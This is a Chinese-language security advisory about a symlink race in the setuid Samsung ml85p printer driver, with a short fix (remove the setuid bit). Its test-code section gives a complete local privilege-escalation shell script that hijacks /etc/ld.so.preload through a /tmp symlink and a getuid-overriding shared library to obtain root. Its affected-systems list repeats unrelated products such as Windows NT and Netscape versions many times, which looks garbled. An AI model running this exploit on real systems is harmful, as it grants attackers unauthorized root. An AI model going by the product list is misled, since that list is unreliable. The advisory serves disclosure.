|
|
Samsung ml85p Printer工具存在符号连接漏洞
发布时间:2001-07-18
更新时间:2001-07-18
严重程度:高
威胁程度:本地管理员权限
错误类型:竞争条件
利用方式:服务器模式
受影响系统Samsung ml85p Printer Driver 1.0
+ Samsung Samsung ML-85G Printer 1.0
- RedHat Powertools 6.2
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- Netscape Communicator 4.77
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.76
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux 2.3
- Caldera OpenLinux eBuilder 3.0
- Netscape Communicator 4.75
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.74
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0
- Conectiva Linux 3.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.73
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98se
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0es
- Conectiva Linux 4.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.72
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- MandrakeSoft Linux Mandrake 7.1
- MandrakeSoft Linux Mandrake 7.0
- MandrakeSoft Linux Mandrake 6.1
- MandrakeSoft Linux Mandrake 6.0
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Conectiva Linux 4.0es
- Conectiva Linux 4.0
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
- Netscape Communicator 4.7
- S.u.S.E. Linux 7.0
- RedHat Linux 6.2 sparc
- RedHat Linux 6.2 i386
- RedHat Linux 6.2 alpha
- RedHat Linux 6.1 sparc
- RedHat Linux 6.1 i386
- RedHat Linux 6.1 alpha
- RedHat Linux 6.0 sparc
- RedHat Linux 6.0 i386
- RedHat Linux 6.0 alpha
- RedHat Linux 5.2 sparc
- RedHat Linux 5.2 i386
- RedHat Linux 5.2 alpha
- Microsoft Windows 98
- Microsoft Windows 95
- Microsoft Windows NT 4.0SP6a
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP6
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP5
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP4
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP3
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP2
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
+ Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
- Conectiva Linux 5.1
- Conectiva Linux 5.0
- Conectiva Linux 4.2
- Conectiva Linux 4.1
- Caldera eServer 2.3
- Caldera eDesktop 2.4
- Caldera OpenLinux eBuilder 3.0
- Caldera OpenLinux Desktop 2.3
+ Ghostscript Ghostscript 5.50 详细描述
ml85p是Samsung ML-85G系列打印机的驱动程序,其中当建立映象输出
文件时没有检查符号连接,会在/tmp目录下建立可猜测名字的文件,
导致本地用户可以进行符号连接攻击,造成权利提升。
测试代码
#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute
# ml85p.
echo "** ml85p exploit"
# set the required umask
umask 0
# get the number of seconds since 1970
DATE=`date +"%s"`
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
echo "** this exploit requires that /usr/bin/ml85p is setuid and
executable."
exit 1
fi
if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
then
echo "** this exploit requires that /etc/ld.so.preload does not exist."
exit 1
fi
echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"
echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_
echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o
echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload
echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so
without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -
echo "** cleaning up"
> /etc/ld.so.preload
rm -f /tmp/g.so
解决方案
去掉ml85p的setuid位。
相关信息
|
